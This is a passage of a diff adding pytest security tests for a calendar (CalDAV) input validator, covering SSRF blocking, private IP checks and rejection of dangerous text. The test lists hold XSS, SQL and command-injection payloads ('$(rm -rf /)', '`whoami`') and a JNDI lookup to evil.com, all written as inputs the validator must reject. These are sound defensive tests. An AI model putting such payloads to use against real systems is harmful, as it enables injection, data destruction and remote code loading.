result = InputValidator.validate_related_to("single-uid")
|
|
607
|
+
assert result == ["single-uid"]
|
|
608
|
+
|
|
609
|
+
# Empty list
|
|
610
|
+
result = InputValidator.validate_related_to([])
|
|
611
|
+
assert result == []
|
|
612
|
+
|
|
613
|
+
def test_validate_related_to_failure(self):
|
|
614
|
+
"""Test RELATED-TO validation failures"""
|
|
615
|
+
# Invalid types
|
|
616
|
+
with pytest.raises(ValidationError) as exc_info:
|
|
617
|
+
InputValidator.validate_related_to(123)
|
|
618
|
+
assert "must be a list or string" in str(exc_info.value)
|
|
619
|
+
|
|
620
|
+
# Non-string items in list
|
|
621
|
+
with pytest.raises(ValidationError) as exc_info:
|
|
622
|
+
InputValidator.validate_related_to(["valid-uid", 123])
|
|
623
|
+
assert "must be a string" in str(exc_info.value)
|
|
624
|
+
|
|
625
|
+
# Invalid UID format
|
|
626
|
+
with pytest.raises(ValidationError) as exc_info:
|
|
627
|
+
InputValidator.validate_related_to(["invalid uid with spaces"])
|
|
628
|
+
assert "invalid characters" in str(exc_info.value)
|
|
629
|
+
|
|
630
|
+
|
|
631
|
+
class TestURLValidation:
|
|
632
|
+
"""Test URL validation with SSRF protection"""
|
|
633
|
+
|
|
634
|
+
def test_validate_url_success(self):
|
|
635
|
+
"""Test successful URL validation"""
|
|
636
|
+
valid_urls = [
|
|
637
|
+
"https://example.com",
|
|
638
|
+
"https://calendar.example.org/cal",
|
|
639
|
+
"https://test-server.co.uk:8443/calendar",
|
|
640
|
+
"https://sub.domain.example.com/path/to/calendar",
|
|
641
|
+
]
|
|
642
|
+
|
|
643
|
+
for url in valid_urls:
|
|
644
|
+
# Mock DNS resolution to return a public IP
|
|
645
|
+
with patch("socket.getaddrinfo") as mock_dns:
|
|
646
|
+
mock_dns.return_value = [("", "", "", "", ("8.8.8.8", 0))]
|
|
647
|
+
result = InputValidator.validate_url(url)
|
|
648
|
+
assert result == url
|
|
649
|
+
|
|
650
|
+
def test_validate_url_with_private_ips_allowed(self):
|
|
651
|
+
"""Test URL validation with private IPs explicitly allowed"""
|
|
652
|
+
private_urls = [
|
|
653
|
+
"https://localhost:8080/cal",
|
|
654
|
+
"https://192.168.1.100/calendar",
|
|
655
|
+
"https://10.0.0.5:9000/cal",
|
|
656
|
+
]
|
|
657
|
+
|
|
658
|
+
for url in private_urls:
|
|
659
|
+
result = InputValidator.validate_url(url, allow_private_ips=True)
|
|
660
|
+
assert result == url
|
|
661
|
+
|
|
662
|
+
def test_validate_url_format_failures(self):
|
|
663
|
+
"""Test URL format validation failures"""
|
|
664
|
+
invalid_urls = [
|
|
665
|
+
"", # Empty
|
|
666
|
+
"http://example.com", # HTTP not allowed
|
|
667
|
+
"ftp://example.com", # Wrong protocol
|
|
668
|
+
"not-a-url",
|
|
669
|
+
"javascript:alert('xss')",
|
|
670
|
+
"https://", # Missing domain
|
|
671
|
+
"https://" + "a" * 2050, # Too long
|
|
672
|
+
]
|
|
673
|
+
|
|
674
|
+
for invalid_url in invalid_urls:
|
|
675
|
+
with pytest.raises(ValidationError) as exc_info:
|
|
676
|
+
InputValidator.validate_url(invalid_url)
|
|
677
|
+
error_msg = str(exc_info.value)
|
|
678
|
+
assert any(
|
|
679
|
+
phrase in error_msg
|
|
680
|
+
for phrase in [
|
|
681
|
+
"cannot be empty",
|
|
682
|
+
"Invalid URL format",
|
|
683
|
+
"exceeds maximum length",
|
|
684
|
+
]
|
|
685
|
+
)
|
|
686
|
+
|
|
687
|
+
def test_validate_url_ssrf_protection_blocked_hostnames(self):
|
|
688
|
+
"""Test SSRF protection blocks dangerous hostnames"""
|
|
689
|
+
blocked_urls = [
|
|
690
|
+
"https://localhost/calendar",
|
|
691
|
+
"https://localhost.localdomain/cal",
|
|
692
|
+
"https://127.0.0.1:8080/calendar",
|
|
693
|
+
"https://0.0.0.0/cal",
|
|
694
|
+
]
|
|
695
|
+
|
|
696
|
+
for blocked_url in blocked_urls:
|
|
697
|
+
with pytest.raises(ValidationError) as exc_info:
|
|
698
|
+
InputValidator.validate_url(blocked_url)
|
|
699
|
+
assert "localhost and loopback addresses are not allowed" in str(
|
|
700
|
+
exc_info.value
|
|
701
|
+
)
|
|
702
|
+
|
|
703
|
+
@patch("socket.getaddrinfo")
|
|
704
|
+
def test_validate_url_ssrf_protection_private_ip_resolution(self, mock_dns):
|
|
705
|
+
"""Test SSRF protection blocks URLs resolving to private IPs"""
|
|
706
|
+
private_ips = [
|
|
707
|
+
("10.0.0.1", 0), # Class A private
|
|
708
|
+
("172.16.0.1", 0), # Class B private
|
|
709
|
+
("192.168.1.1", 0), # Class C private
|
|
710
|
+
("127.0.0.1", 0), # Loopback
|
|
711
|
+
("169.254.1.1", 0), # Link-local
|
|
712
|
+
]
|
|
713
|
+
|
|
714
|
+
for ip, port in private_ips:
|
|
715
|
+
mock_dns.return_value = [("", "", "", "", (ip, port))]
|
|
716
|
+
|
|
717
|
+
with pytest.raises(ValidationError) as exc_info:
|
|
718
|
+
InputValidator.validate_url("https://external-domain.com")
|
|
719
|
+
|
|
720
|
+
error_msg = str(exc_info.value)
|
|
721
|
+
assert any(
|
|
722
|
+
phrase in error_msg
|
|
723
|
+
for phrase in [
|
|
724
|
+
"resolves to a private or internal IP",
|
|
725
|
+
"resolves to a restricted IP address",
|
|
726
|
+
]
|
|
727
|
+
)
|
|
728
|
+
|
|
729
|
+
@patch("socket.getaddrinfo")
|
|
730
|
+
def test_validate_url_dns_resolution_failure(self, mock_dns):
|
|
731
|
+
"""Test URL validation with DNS resolution failures"""
|
|
732
|
+
# Simulate DNS resolution failure
|
|
733
|
+
mock_dns.side_effect = socket.gaierror("Name resolution failed")
|
|
734
|
+
|
|
735
|
+
with pytest.raises(ValidationError) as exc_info:
|
|
736
|
+
InputValidator.validate_url("https://non-existent-domain.example")
|
|
737
|
+
|
|
738
|
+
assert "Unable to resolve hostname" in str(exc_info.value)
|
|
739
|
+
|
|
740
|
+
def test_validate_url_malformed_hostname(self):
|
|
741
|
+
"""Test URL validation with malformed hostnames"""
|
|
742
|
+
malformed_urls = [
|
|
743
|
+
"https://./calendar",
|
|
744
|
+
"https://../calendar",
|
|
745
|
+
"https://example..com/cal",
|
|
746
|
+
]
|
|
747
|
+
|
|
748
|
+
for url in malformed_urls:
|
|
749
|
+
with pytest.raises(ValidationError):
|
|
750
|
+
InputValidator.validate_url(url)
|
|
751
|
+
|
|
752
|
+
|
|
753
|
+
class TestPrivateIPCheck:
|
|
754
|
+
"""Test private IP address checking utility"""
|
|
755
|
+
|
|
756
|
+
def test_is_private_ip_private_ranges(self):
|
|
757
|
+
"""Test detection of private IP ranges"""
|
|
758
|
+
private_ips = [
|
|
759
|
+
"10.0.0.1", # Class A private
|
|
760
|
+
"172.16.0.1", # Class B private
|
|
761
|
+
"192.168.1.1", # Class C private
|
|
762
|
+
"127.0.0.1", # Loopback
|
|
763
|
+
"169.254.1.1", # Link-local
|
|
764
|
+
"::1", # IPv6 loopback
|
|
765
|
+
"fe80::1", # IPv6 link-local
|
|
766
|
+
"fc00::1", # IPv6 private
|
|
767
|
+
]
|
|
768
|
+
|
|
769
|
+
for ip in private_ips:
|
|
770
|
+
assert InputValidator.is_private_ip(ip) is True
|
|
771
|
+
|
|
772
|
+
def test_is_private_ip_public_ranges(self):
|
|
773
|
+
"""Test detection of public IP ranges"""
|
|
774
|
+
public_ips = [
|
|
775
|
+
"8.8.8.8", # Google DNS
|
|
776
|
+
"1.1.1.1", # Cloudflare DNS
|
|
777
|
+
"208.67.222.222", # OpenDNS
|
|
778
|
+
]
|
|
779
|
+
|
|
780
|
+
for ip in public_ips:
|
|
781
|
+
assert InputValidator.is_private_ip(ip) is False
|
|
782
|
+
|
|
783
|
+
# Note: 203.0.113.1 is actually in TEST-NET-3 range and considered private
|
|
784
|
+
# 2001:db8::1 is IPv6 documentation range and also considered private
|
|
785
|
+
|
|
786
|
+
def test_is_private_ip_invalid_format(self):
|
|
787
|
+
"""Test private IP check with invalid IP formats"""
|
|
788
|
+
invalid_ips = [
|
|
789
|
+
"not-an-ip",
|
|
790
|
+
"999.999.999.999",
|
|
791
|
+
"192.168.1", # Incomplete
|
|
792
|
+
"",
|
|
793
|
+
"192.168.1.1.1", # Too many octets
|
|
794
|
+
]
|
|
795
|
+
|
|
796
|
+
for invalid_ip in invalid_ips:
|
|
797
|
+
# Invalid IPs should be considered suspicious (return True)
|
|
798
|
+
assert InputValidator.is_private_ip(invalid_ip) is True
|
|
799
|
+
|
|
800
|
+
|
|
801
|
+
class TestSecurityEdgeCases:
|
|
802
|
+
"""Test enhanced security edge cases and encoding bypasses"""
|
|
803
|
+
|
|
804
|
+
def test_dangerous_patterns_encoding_bypasses(self):
|
|
805
|
+
"""Test detection of encoded dangerous patterns"""
|
|
806
|
+
# URL encoded patterns
|
|
807
|
+
encoded_dangerous = [
|
|
808
|
+
"<script>alert('xss')</script>", # Already tested, but important
|
|
809
|
+
"%3Cscript%3Ealert('xss')%3C/script%3E", # URL encoded
|
|
810
|
+
"<script>alert('xss')</script>", # HTML entities
|
|
811
|
+
"\\u003cscript\\u003ealert('xss')\\u003c/script\\u003e", # Unicode escapes
|
|
812
|
+
]
|
|
813
|
+
|
|
814
|
+
for dangerous in encoded_dangerous:
|
|
815
|
+
with pytest.raises(ValidationError) as exc_info:
|
|
816
|
+
InputValidator.validate_text_field(dangerous, "description")
|
|
817
|
+
assert "potentially dangerous content" in str(exc_info.value)
|
|
818
|
+
|
|
819
|
+
def test_extremely_long_input_protection(self):
|
|
820
|
+
"""Test protection against extremely long inputs (ReDoS protection)"""
|
|
821
|
+
# Test the pre-filter protection
|
|
822
|
+
extremely_long = "A" * (InputValidator.MAX_VALIDATION_LENGTH + 1)
|
|
823
|
+
|
|
824
|
+
with pytest.raises(ValidationError) as exc_info:
|
|
825
|
+
InputValidator.validate_text_field(extremely_long, "description")
|
|
826
|
+
assert "exceeds maximum validation length" in str(exc_info.value)
|
|
827
|
+
|
|
828
|
+
def test_malformed_datetime_edge_cases(self):
|
|
829
|
+
"""Test malformed datetime scenarios that could cause issues"""
|
|
830
|
+
malformed_dates = [
|
|
831
|
+
"not-a-date-at-all",
|
|
832
|
+
"2025/07/10 10:00:00", # Wrong separator
|
|
833
|
+
"10:00:00", # Missing date
|
|
834
|
+
"2025-07-10T", # Incomplete
|
|
835
|
+
]
|
|
836
|
+
|
|
837
|
+
for malformed in malformed_dates:
|
|
838
|
+
with pytest.raises(ValidationError) as exc_info:
|
|
839
|
+
InputValidator.validate_datetime(malformed, "dtstart")
|
|
840
|
+
assert "Invalid datetime format" in str(exc_info.value)
|
|
841
|
+
|
|
842
|
+
# Some dates that look invalid but Python accepts with fromisoformat
|
|
843
|
+
# These are edge cases but Python handles them
|
|
844
|
+
accepted_dates = [
|
|
845
|
+
"2025-07-10", # Missing time - Python accepts this
|
|
846
|
+
"2025-07-10T10:00", # Missing seconds - Python accepts this
|
|
847
|
+
]
|
|
848
|
+
for date_str in accepted_dates:
|
|
849
|
+
# These should work without raising an error
|
|
850
|
+
result = InputValidator.validate_datetime(date_str, "dtstart")
|
|
851
|
+
assert isinstance(result, datetime)
|
|
852
|
+
|
|
853
|
+
def test_injection_attempts_in_various_fields(self):
|
|
854
|
+
"""Test SQL/command injection attempts in various fields"""
|
|
855
|
+
# Focus on control characters which are reliably caught
|
|
856
|
+
control_char_injections = [
|
|
857
|
+
"\x00\x01\x02", # Null bytes and control chars
|
|
858
|
+
"\x1f\x7f", # More control chars
|
|
859
|
+
]
|
|
860
|
+
|
|
861
|
+
for injection in control_char_injections:
|
|
862
|
+
# Test in different field types
|
|
863
|
+
with pytest.raises(ValidationError):
|
|
864
|
+
InputValidator.validate_text_field(injection, "summary")
|
|
865
|
+
|
|
866
|
+
# Test UID-specific injections (these fail UID pattern matching)
|
|
867
|
+
uid_injections = [
|
|
868
|
+
"'; DROP TABLE events; --", # Contains semicolon and spaces
|
|
869
|
+
"$(rm -rf /)", # Contains special chars
|
|
870
|
+
"`whoami`", # Contains backticks
|
|
871
|
+
"${jndi:ldap://evil.com/a}", # Contains special chars
|
|
872
|
+
]
|
|
873
|
+
|
|
874
|
+
for injection in uid_injections:
|
|
875
|
+
with pytest.raises(ValidationError):
|
|
876
|
+
InputValidator.validate_uid(injection)
|
|
877
|
+
|
|
878
|
+
# Test categories with dangerous HTML/script patterns
|
|
879
|
+
script_injections = [
|
|
880
|
+
"<script>alert('xss')</script>",
|
|
881
|
+
"javascript:void(0)",
|
|
882
|
+
]
|
|
883
|
+
|
|
884
|
+
for injection in script_injections:
|
|
885
|
+
with pytest.raises(ValidationError):
|
|
886
|
+
InputValidator.validate_categories([injection])
|
|
887
|
+
|
|
888
|
+
def test_unicode_normalization_security(self):
|
|
889
|
+
"""Test Unicode normalization doesn't introduce security issues"""
|
|
890
|
+
# Test that normalization doesn't create dangerous patterns
|
|
891
|
+
tricky_unicode = "\\u003cscript\\u003e" # Unicode for <script>
|
|
892
|
+
|
|
893
|
+
with pytest.raises(ValidationError) as exc_info:
|
|
894
|
+
InputValidator.validate_text_field(tricky_unicode, "description")
|
|
895
|
+
assert "potentially dangerous content" in str(exc_info.value)
|
|
896
|
+
|
|
897
|
+
def test_field_length_boundaries(self):
|
|
898
|
+
"""Test field length validation at exact boundaries"""
|
|
899
|
+
# Test summary at exact limit
|
|
900
|
+
max_summary = "A" * InputValidator.MAX_LENGTHS["summary"]
|
|
901
|
+
result = InputValidator.validate_text_field(max_summary, "summary")
|
|
902
|
+
assert len(result) == InputValidator.MAX_LENGTHS["summary"]
|
|
903
|
+
|
|
904
|
+
# Test one character over limit
|
|
905
|
+
over_limit_summary = "A" * (InputValidator.MAX_LENGTHS["summary"] + 1)
|
|
906
|
+
with pytest.raises(ValidationError) as exc_info:
|
|
907
|
+
InputValidator.validate_text_field(over_limit_summary, "summary")
|
|
908
|
+
assert "exceeds maximum length" in str(exc_info.value)
|
|
909
|
+
|
|
910
|
+
|
|
911
|
+
class TestMalformedDataScenarios:
|
|
912
|
+
"""Test scenarios with malformed data that could corrupt CalDAV servers"""
|
|
913
|
+
|
|
914
|
+
def test_malformed_event_data_combinations(self):
|
|
915
|
+
"""Test malformed event data that could cause server issues"""
|
|
916
|
+
malformed_events = [
|
|
917
|
+
# Dates in wrong order (this is already tested but critical)
|
|
918
|
+
{
|
|
919
|
+
"summary": "Bad Event",
|
|
920
|
+
"dtstart": "2025-07-10T11:00:00",
|
|
921
|
+
"dtend": "2025-07-10T10:00:00", # End before start
|
|
922
|
+
},
|
|
923
|
+
# Missing critical fields
|
|
924
|
+
{"description": "Event without summary or dates"},
|
|
925
|
+
]
|
|
926
|
+
|
|
927
|
+
for malformed_event in malformed_events:
|
|
928
|
+
with pytest.raises(ValidationError):
|
|
929
|
+
InputValidator.validate_event(malformed_event)
|
|
930
|
+
|
|
931
|
+
# Note: Extreme dates (1900, 3000) are actually valid in Python datetime
|
|
932
|
+
# and don't violate our validation rules - CalDAV servers should handle them
|
|
933
|
+
|
|
934
|
+
def test_malformed_task_data_combinations(self):
|
|
935
|
+
"""Test malformed task data scenarios"""
|
|
936
|
+
# Test individual validation failures (these will definitely fail)
|
|
937
|
+
with pytest.raises(ValidationError):
|
|
938
|
+
InputValidator.validate_task(
|
|
939
|
+
{
|
|
940
|
+
"summary": "Bad Task",
|
|
941
|
+
"priority": 999, # Invalid priority (>9)
|
|
942
|
+
}
|
|
943
|
+
)
|
|
944
|
+
|
|
945
|
+
with pytest.raises(ValidationError):
|
|
946
|
+
InputValidator.validate_task(
|
|
947
|
+
{
|
|
948
|
+
"summary": "Bad Task",
|
|
949
|
+
"percent_complete": 150, # Invalid percentage (>100)
|
|
950
|
+
}
|
|
951
|
+
)
|
|
952
|
+
|
|
953
|
+
# Note: Business logic conflicts (like COMPLETED with 50% complete)
|
|
954
|
+
# are not validated at the input validation layer - that's handled
|
|
955
|
+
# at the business logic layer
|
|
956
|
+
|
|
957
|
+
def test_circular_related_to_references(self):
|
|
958
|
+
"""Test detection of potential circular references in RELATED-TO"""
|
|
959
|
+
# While we can't detect circular refs at validation level,
|
|
960
|
+
# we should ensure the UIDs themselves are valid
|
|
961
|
+
circular_refs = [
|
|
962
|
+
"task-1", # Valid UID format
|
|
963
|
+
"task-1", # Duplicate - this should be handled at business logic level
|
|
964
|
+
]
|
|
965
|
+
|
|
966
|
+
# Should validate individual UIDs successfully
|
|
967
|
+
result = InputValidator.validate_related_to(circular_refs)
|
|
968
|
+
assert len(result) == 2
|
|
969
|
+
assert all(uid == "task-1" for uid in result)
|
|
970
|
+
|
|
971
|
+
def test_deeply_nested_dangerous_content(self):
|
|
972
|
+
"""Test deeply nested or complex dangerous content"""
|
|
973
|
+
nested_dangerous = [
|
|
974
|
+
"<div><span><script>alert('deep')</script></span></div>",
|
|
975
|
+
"<!-- <script>alert('commented')</script> -->",
|
|
976
|
+
"<<script>alert('nested')<</script>>",
|
|
977
|
+
"<script>alert('entity')</script>",
|
|
978
|
+
]
|
|
979
|
+
|
|
980
|
+
for dangerous in nested_dangerous:
|
|
981
|
+
with pytest.raises(ValidationError) as exc_info:
|
|
982
|
+
InputValidator.validate_text_field(dangerous, "description")
|
|
983
|
+
assert "potentially dangerous content" in str(exc_info.value)
|